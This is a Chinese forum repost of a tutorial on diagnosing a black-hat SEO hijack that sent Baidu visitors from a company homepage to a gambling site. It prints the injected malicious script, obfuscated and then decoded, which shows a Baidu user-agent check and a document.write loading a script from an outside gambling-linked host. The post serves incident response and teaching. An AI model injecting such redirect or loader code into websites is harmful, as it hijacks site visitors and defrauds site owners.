j8typz 发表于 2024-8-29 19:04:49

处理黑帽seo劫持问题|详解分析,菜鸟都看得懂的内容


    <div style="color: black; text-align: left; margin-bottom: 10px;">
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">​​</p>
      <div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/153967679352258a1fdd9a2~noop.image?_iz=58558&amp;from=article.pc_detail&amp;lk3s=953192f4&amp;x-expires=1725534210&amp;x-signature=WpM%2FP0DcDqzC%2FVB1kdBjDczms%2BY%3D" style="width: 50%; margin-bottom: 20px;"></div>
      <div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/15396767934847b29a3fb8e~noop.image?_iz=58558&amp;from=article.pc_detail&amp;lk3s=953192f4&amp;x-expires=1725534210&amp;x-signature=pxVDO7%2BUk%2BQDF59j3htiCNVv8Tk%3D" style="width: 50%; margin-bottom: 20px;"></div>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">上午上q,刚登上去,老铁跟我讲被欺负了,网站从百度搜索进去,首页<span style="color: black;">出现</span><span style="color: black;">转</span>到菠菜(博彩)网,<span style="color: black;">研发</span><span style="color: black;">机构</span>的说可能是百度的问题,不是<span style="color: black;">咱们</span>的问题,这种判断能力我只能说智商堪忧,又是xxxxx的网站<span style="color: black;">研发</span><span style="color: black;">机构</span>。</p>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">直接进入正题,直接site:www.zyisolar.com</p>
      <div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/1539676793461477b61a6e6~noop.image?_iz=58558&amp;from=article.pc_detail&amp;lk3s=953192f4&amp;x-expires=1725534210&amp;x-signature=JBOe722ZCPRMsO9oArF7Q78bbwg%3D" style="width: 50%; margin-bottom: 20px;"></div>
      <div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/1539676793464f6e00dc54f~noop.image?_iz=58558&amp;from=article.pc_detail&amp;lk3s=953192f4&amp;x-expires=1725534210&amp;x-signature=z0Zb4b0CdtwRndHqHpCBiBgWG0U%3D" style="width: 50%; margin-bottom: 20px;"></div>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">打开首页<span style="color: black;">出现</span>了<span style="color: black;">转</span>,到</p>https://www.365da8s.com/zh-cn/这个菠菜,其他页面<span style="color: black;">无</span>,劫持代码只放在首页,<span style="color: black;">咱们</span>直接看代码
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">倘若</span>是<span style="color: black;">没法</span>直接从首页查看源码的<span style="color: black;">状况</span>,<span style="color: black;">那样</span>在浏览器输入view-source:域名 就<span style="color: black;">能够</span>查看网页源码</p>
      <div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/15396767935473824e213f3~noop.image?_iz=58558&amp;from=article.pc_detail&amp;lk3s=953192f4&amp;x-expires=1725534210&amp;x-signature=86lHaeG0bCAONM9wMZ8CG%2F0ootY%3D" style="width: 50%; margin-bottom: 20px;"></div>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">只需要看头部代码好<span style="color: black;">熟练</span>,黑帽seo这行技术这几年<span style="color: black;">亦</span>没什么创新,删除这两行就<span style="color: black;">能够</span><span style="color: black;">处理</span>基本问题</p>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">
            if (
      </p>navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="中亿光伏-品牌光伏集成商"}&lt;/script&gt;

      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&lt;script type="text/javascript"&gt;eval(function(p,a,c,k,e,d){e=function(c){return(c&lt;a?"":e(parseInt(c/a)))+((c=c%a)&gt;35?String.fromCharCode(c+29):c.toString(36))};if(!.replace(/^/,String)){while(c--)d=k||e(c);k=}];e=function(){return\\w+};c=1;};while(c--)if(k)p=p.replace(new RegExp(\\b+e(c)+\\b,g),k);return p;}(l["\\e\\c\\1\\n\\f\\8\\o\\0"]["\\7\\3\\9\\0\\8"](\\\g\\2\\1\\3\\9\\4\\0 \\0\\m\\4\\8\\d\\6\\0\\8\\j\\0\\5\\h\\a\\k\\a\\2\\1\\3\\9\\4\\0\\6 \\2\\3\\1\\d\\6\\t\\0\\0\\4\\2\\u\\5\\5\\7\\7\\7\\b\\v\\1\\e\\a\\2\\q\\b\\1\\c\\f\\5\\r\\p\\s\\b\\h\\2\\6\\i\\g\\5\\2\\1\\3\\9\\4\\0\\i\);,32,32,x74|x63|x73|x72|x70|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6d|x3c|x6a|x3e|x78|x76|window|x79|x75|x6e|x36|x38|x33|x35|x68|x3a|x62.split(|),0,{}))&lt;/script&gt;</p>
      <div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/15396767935114fdba66413~noop.image?_iz=58558&amp;from=article.pc_detail&amp;lk3s=953192f4&amp;x-expires=1725534210&amp;x-signature=RwFFJa8Als6IHLRzstNKDX2gon8%3D" style="width: 50%; margin-bottom: 20px;"></div>
      <div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/153967679368500b3d286f0~noop.image?_iz=58558&amp;from=article.pc_detail&amp;lk3s=953192f4&amp;x-expires=1725534210&amp;x-signature=oTGKcwmuL0hX8eTq8Z9pukm705E%3D" style="width: 50%; margin-bottom: 20px;"></div>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">Keywords和description进行Unicode解码,结果:</strong></p>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">bet365官方平台开户,bet365官方备用网址,bet365官方网站是多少,bet365官方亚洲版,bet365.com官方网站,bet365官方投注,bet365官方网站,bet365官方中文版,bet365中文官方网站,英国bet365官方网,bet365官方投注网站,bet365官方投注网址,bet365官方网投,bet365官方备用,bet365官方网站是多</p>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">

            if (

      </p>navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="中亿光伏-品牌光伏集成商"}&lt;/script&gt;这段意思<span style="color: black;">便是</span><strong style="color: blue;">判断百度搜索<span style="color: black;">拜访</span>用户进行<span style="color: black;">转</span></strong>,你去360,搜狗搜索<span style="color: black;">拜访</span>肯定是不会<span style="color: black;">出现</span><span style="color: black;">转</span>的
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><span style="color: black;">而后</span><span style="color: black;">咱们</span>再来解最后一段代码</p>
      <div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/15396767936326dec7965b9~noop.image?_iz=58558&amp;from=article.pc_detail&amp;lk3s=953192f4&amp;x-expires=1725534210&amp;x-signature=SgUIJrkrF6M55Kri53GLR8IGWGo%3D" style="width: 50%; margin-bottom: 20px;"></div>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">先进行js解压,得出结果</p>
      <div style="color: black; text-align: left; margin-bottom: 10px;"><img src="https://p3-sign.toutiaoimg.com/pgc-image/1539676793632f4f57d8447~noop.image?_iz=58558&amp;from=article.pc_detail&amp;lk3s=953192f4&amp;x-expires=1725534210&amp;x-signature=X7qx18XYMgev7kIK9ZMTOU9X3cA%3D" style="width: 50%; margin-bottom: 20px;"></div>
      <h1 style="color: black; text-align: left; margin-bottom: 10px;"><strong style="color: blue;">javascript代码方式解密 </strong></h1>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">1:\x64\x6f\x63\x75\x6d\x65\x6e\x74 <strong style="color: blue;">结果 document</strong></p>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">2:\x77\x72\x69\x74\x65 <strong style="color: blue;">结果 write</strong></p>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">3:\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22\x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x62\x63\x64\x61\x73\x38\x2e\x63\x6f\x6d\x2f\x33\x36\x35\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e</p>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;"><strong style="color: blue;">结果 </strong></p><strong style="color: blue;">https://www.bcdas8.com/365.js"&gt;&lt;/script&gt;
      </strong>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">整段的解密结果<span style="color: black;">便是</span>:</p>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">&lt;script type="text/javascript"&gt; window["document"]["write"] (&lt;script type="text/javascript" src="https://www.bcdas8.com/365.js"&gt;&lt;/script&gt;); &lt;/script&gt;</p>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">到了<span style="color: black;">这儿</span><span style="color: black;">全部</span>过程<span style="color: black;">已然</span>很清晰了,虽然<span style="color: black;">咱们</span>删除了这段代码但只能暂时<span style="color: black;">处理</span>问题,需要找出webshell,做一个全面的网站和服务器安全策略,这种批量GetShell的基本上都是<span style="color: black;">经过</span><span style="color: black;">日前</span><span style="color: black;">已然</span>开放的漏洞,<span style="color: black;">因此</span>相对还是比较容易处理</p>
      <p style="font-size: 16px; color: black; line-height: 40px; text-align: left; margin-bottom: 15px;">大<span style="color: black;">都数</span>人对网站的理解还停留在视觉层面,网络安全的重要性反而被<span style="color: black;">忽略</span>,曾经我<span style="color: black;">亦</span>主攻过渗透攻防,以打击菠菜(博彩)和成人色情,传销等网站服务器为乐,我<span style="color: black;">触及</span>这块技术的目的不是为了干点什么,而是为<span style="color: black;">认识</span>决问题。任何公司需要<span style="color: black;">加强</span>对网络安全的<span style="color: black;">注重</span>,找网络<span style="color: black;">研发</span><span style="color: black;">机构</span><span style="color: black;">亦</span>要避免入坑​​​​</p>
    </div>




m5k1umn 发表于 2024-10-25 00:51:03

你说得对,我们一起加油,未来可期。
页: [1]
查看完整版本: 处理黑帽seo劫持问题|详解分析,菜鸟都看得懂的内容